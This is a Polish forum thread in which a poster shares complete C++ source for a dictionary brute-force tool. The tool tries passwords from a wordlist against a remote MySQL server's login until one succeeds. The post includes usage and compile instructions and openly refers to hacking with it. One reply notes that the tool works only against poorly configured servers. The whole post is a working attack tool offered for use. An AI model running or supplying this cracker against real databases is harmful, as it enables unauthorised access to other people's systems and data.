Łamanie hasła użytkowika MySQL.

discovery44

Były Moderator
Dołączył
Sierpień 14, 2007
Posty
763
Wczoraj napisałem taki mały, śmieszny program który z pewnością się przyda. Wersja na Linuksa, na Windowsa nie mam zamiaru robić, temat zakładam po to bo chcę pokazać jak to zaimplementować w C++:
Kod:
#include <iostream>
#include <stdlib.h>
#include <fstream>
#include "mysql/mysql.h"
using namespace std;

void autor();
int g00d;
int main(int argc, char *argv[])
{
    autor();
    if(argc != 5) cout << "Użycie: " << argv[0] << " IP username database dict.txt\n";
    else
    {
        string serwer(argv[1]), login(argv[2]), database(argv[3]), fname(argv[4]), pass;
        ifstream dict(fname.c_str(), ios::in);
        if(!dict) { cout << "Brak słownika!\n"; exit(0); }
        MYSQL *sql;
        sql = mysql_init(0);
        while(1)
        {
            getline(dict, pass);
            if( mysql_real_connect(sql, serwer.c_str(), login.c_str(), pass.c_str(), database.c_str(),0,0,0) )
            {
                cout << "[" << serwer << ":" << login
                    << " " << database << "] Password = "
                    << pass << endl;
                g00d = 1;
                break;
            }
        }
    }
    if(!g00d) cout << "Hasło nie znalezione!\n";
}


void autor()
{
    cout << string(50, '#') << "\r\n"
    << string(15, '#') << string(5, ' ') << "discovery44" << string(5, ' ') << string(14, '#') << endl
    << string(50, '#') << endl;
}
Do prawidłowej kompilacji potrzebna jest zewnętrzna biblioteka, o instalacji i podstawowej obsłudze MySQL'a napisałem tutaj: LINK. Jeżeli ktoś chce haksić za pomocą tego programu ale "coś mu nie działa" to niech tego nie pisze bo nie ma po co ;) Wszystko jest napisane przy uruchamianiu programu. Jeżeli ktoś chce wersje na Windowsa to należy pobrać sobie wersje biblioteki do MySQL'a na Windowsa i dolinkować ją w swoim IDE. Słownik oczywiście w formacie
Kod:
qwe
asd
zxc
:)

// wyglądem strony którą podałem się nie przejmujcie ani nie piszcie, że jest brzydka bo taka ma być. ;)
 
Ostatnia edycja:

widmo17

Były Moderator
Dołączył
Lipiec 16, 2007
Posty
1089
Ciekawy progz, z tym że on się sprawdzi tylko przy słabej konfiguracji mysqla albo przy otwartych bazach typu freesql. Dobrze skonfigurowany mysqld nie pozwala na połączenia spoza localhosta.
 
Do góry Bottom